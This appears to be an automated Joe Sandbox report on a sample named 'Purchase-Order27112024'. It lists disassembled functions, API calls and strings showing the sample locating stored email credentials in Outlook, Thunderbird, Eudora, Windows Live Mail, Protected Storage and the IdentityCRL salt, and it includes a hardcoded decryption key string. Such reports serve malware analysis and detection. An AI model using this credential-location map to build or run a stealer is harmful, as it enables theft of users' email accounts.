4045db 7 API calls 33991->33992 33993 40f708 33992->33993 33994 40f7e2 33993->33994 33995 404734 3 API calls 33993->33995 33996 404656 FreeLibrary 33994->33996 34000 40f715 33995->34000 33997 40f7f1 33996->33997 33998 404785 FreeLibrary 33997->33998 33999 40f7fc 33998->33999 33999->33845 34000->33994 34001 40f797 WideCharToMultiByte 34000->34001 34002 40f7b8 strlen 34001->34002 34003 40f7d9 LocalFree 34001->34003 34002->34003 34004 40f7c8 _mbscpy 34002->34004 34003->33994 34004->34003 34005->33845 34007 4078e6 34006->34007 34008 4078c7 _mbsnbcat 34007->34008 34009 4078ea 34007->34009 34008->34007 34009->33971 34010->33979 34011->33982 34012->33991 34026 410a9c RegOpenKeyExA 34013->34026 34015 44458b 34016 40381a 34015->34016 34027 410add RegQueryValueExA 34015->34027 34016->33855 34024 4021b6 memset 34016->34024 34018 4445dc RegCloseKey 34018->34016 34019 4445a4 34019->34018 34028 410add RegQueryValueExA 34019->34028 34021 4445c1 34021->34018 34029 444879 30 API calls 34021->34029 34023 4445da 34023->34018 34024->33857 34025->33855 34026->34015 34027->34019 34028->34021 34029->34023 34030->33878 34032 4075c9 34031->34032 34033 4075bb _mbscat 34031->34033 34034 444212 34032->34034 34033->34032 34051 407e9d 34034->34051 34037 44424d 34038 444274 34037->34038 34039 444258 34037->34039 34059 407ef8 34037->34059 34040 407e9d 9 API calls 34038->34040 34072 444196 52 API calls 34039->34072 34047 4442a0 34040->34047 34042 407ef8 9 API calls 34042->34047 34043 4442ce 34069 407f90 34043->34069 34047->34042 34047->34043 34049 444212 65 API calls 34047->34049 34073 407e62 strcmp strcmp 34047->34073 34048 407f90 FindClose 34050 4442e4 34048->34050 34049->34047 34050->33900 34052 407f90 FindClose 34051->34052 34053 407eaa 34052->34053 34054 406f06 2 API calls 34053->34054 34055 407ebd strlen strlen 34054->34055 34056 407ee1 34055->34056 34057 407eea 34055->34057 34074 4070e3 strlen _mbscat _mbscpy _mbscat 34056->34074 34057->34037 34060 407f03 FindFirstFileA 34059->34060 34061 407f24 FindNextFileA 34059->34061 34064 407f3f 34060->34064 34062 407f46 strlen strlen 34061->34062 34063 407f3a 34061->34063 34066 407f7f 34062->34066 34067 407f76 34062->34067 34065 407f90 FindClose 34063->34065 34064->34062 34064->34066 34065->34064 34066->34037 34075 4070e3 strlen _mbscat _mbscpy _mbscat 34067->34075 34070 407fa3 34069->34070 34071 407f99 FindClose 34069->34071 34070->34048 34071->34070 34072->34037 34073->34047 34074->34057 34075->34066 34076->33504 34077->33508 34078->33516 34079->33514 34080->33515 34081->33519 34082->33513 34428 43ffc8 18 API calls 34242 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34243 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34244 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34246 4335ee 16 API calls __fprintf_l 34444 429fef 11 API calls 34247 444deb _exit _c_exit 34445 40bbf0 138 API calls 34250 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34254 4021ff 14 API calls 34255 43f5fc 149 API calls 34450 40e381 9 API calls 34257 405983 40 API calls 34258 42b186 27 API calls __fprintf_l 34259 427d86 76 API calls 34260 403585 20 API calls 34262 42e58e 18 API calls __fprintf_l 34265 425115 75 API calls __fprintf_l 34267 401592 8 API calls 33172 410b92 33175 410a6b 33172->33175 33174 410bb2 33176 410a77 33175->33176 33177 410a89 GetPrivateProfileIntA 33175->33177 33180 410983 memset _itoa WritePrivateProfileStringA 33176->33180 33177->33174 33179 410a84 33179->33174 33180->33179 34454 434395 16 API calls 34269 441d9c memcmp 34456 43f79b 119 API calls 34270 40c599 43 API calls 34457 426741 87 API calls 34274 4401a6 21 API calls 34276 426da6 memcpy memset memset memcpy 34277 4335a5 15 API calls 34279 4299ab memset memset memcpy memset memset 34280 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 34083 410bbc 34086 4109cf 34083->34086 34087 4109dc 34086->34087 34088 410a23 memset GetPrivateProfileStringA 34087->34088 34089 4109ea memset 34087->34089 34094 407646 strlen 34088->34094 34099 4075cd sprintf memcpy 34089->34099 34092 410a0c WritePrivateProfileStringA 34093 410a65 34092->34093 34095 40765a 34094->34095 34096 40765c 34094->34096 34095->34093 34098 4076a3 34096->34098 34100 40737c strtoul 34096->34100 34098->34093 34099->34092 34100->34096 34282 40b5bf memset memset _mbsicmp

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                      • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                      • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 379999529-620537770
                                                                                                      • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                      • API String ID: 1846531875-4223776976
                                                                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,76230A60,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404AB8
                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76230A60), ref: 00404ADE
                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                      • API String ID: 745651260-375988210
                                                                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                      Strings
                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                      • API String ID: 1197458902-317895162
                                                                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                      • String ID: h4ND
                                                                                                      • API String ID: 3662548030-3825183422
                                                                                                      • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                      • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                      • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                      • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                      • API String ID: 2768085393-1693574875
                                                                                                      • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                      • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                      Strings
                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                      • API String ID: 832325562-2578778931
                                                                                                      • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                      • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 2012582556-3916222277
                                                                                                      • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                      • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                      Control-flow Graph

                                                                                                      • Executed
